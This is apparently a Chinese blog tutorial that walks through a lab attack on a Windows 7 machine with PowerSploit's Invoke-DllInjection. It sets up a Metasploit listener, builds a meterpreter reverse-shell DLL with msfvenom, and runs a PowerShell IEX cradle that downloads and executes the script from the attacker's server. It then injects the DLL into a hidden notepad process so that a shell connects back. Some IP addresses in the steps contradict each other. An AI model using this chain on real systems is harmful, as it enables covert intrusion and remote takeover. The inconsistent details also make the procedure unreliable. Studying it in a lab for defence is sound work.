使用Invoke-DLLInjection进行powershell的DLL注入

环境

攻击机 kali ip 192.168.64.129

靶机 win7 ip 192.168.64.143

PowerSploit是一款基于PowerShell的后渗透(Post-Exploition)框架软件,包含很多PowerShell攻击脚本,它们主要用于渗透中的信息侦查、权限提升、权限维持。其GitHub地址为:GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation Framework

1、PowerSploit的安装

首先kali下载PowerSploit,首先输入git命令下载程序目录

git clone https://github.com/PowerShellMafia/PowerSploit

接着输入开启Apache服务

service apache2 start

/etc/init.d/apache2 start

把下载好的文件夹移动到var/www/html目录,打开http://192.168.64.143/PowerSploit/,如下图所示。

2.Invoke-DLLInjection介绍


Code Execution 模块下的脚本 Invoke-DLLInjection,是一个DLL注入脚本

DLL注入是指向运行中的其他进程强制插入特定的DLL文件。其工作原理是从外部促使目标进程调用LoadLibrary() API从而强制执行DLL的DllMain()函数,而且被注入的DLL拥有目标进程内存的访问权限,用户可以随意操作。与一般的DLL加载的区别在于,DLL注入加载的目标进程是其自身或其他进程。

3.开启msf监听

LHOST为攻击机即kali的IP地址,不然会监听失败

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.101.46

run

4.使用msfvenom生成dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.64.129 lport=4444 -f dll -o /var/www/html/test.dll

 

5. 在目标机器下载Invoke-DllInjection.psl脚本
IEX (New-Object Net.WebClient).DownloadString("http://192.168.64.129/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")
6. 把生成的test.dll上传到目标服务器的C盘

把生成的test.dll复制到目标服务器的C盘的win目录下,就能启动一个新的进程进行DLL注入,这样可以使注入更加隐蔽。

7. 使用以下命令新建一个名为notepad.exe的隐藏进程并获取notepad的进程号
 Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden
 Get-Process -Name notepad

8. 使用以下命令进行注入
 Invoke-DllInjection -ProcessID 216 -Dll c:\win\test.dll

9. 返回MSF监听界面,发现已经反弹成功

参考

使用powersploit的Invoke-DLLInjection进行DLL注入_dlt injection.-CSDN博客

Powersploit的安装及脚本攻击实战 - zhengna - 博客园 (cnblogs.com)

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值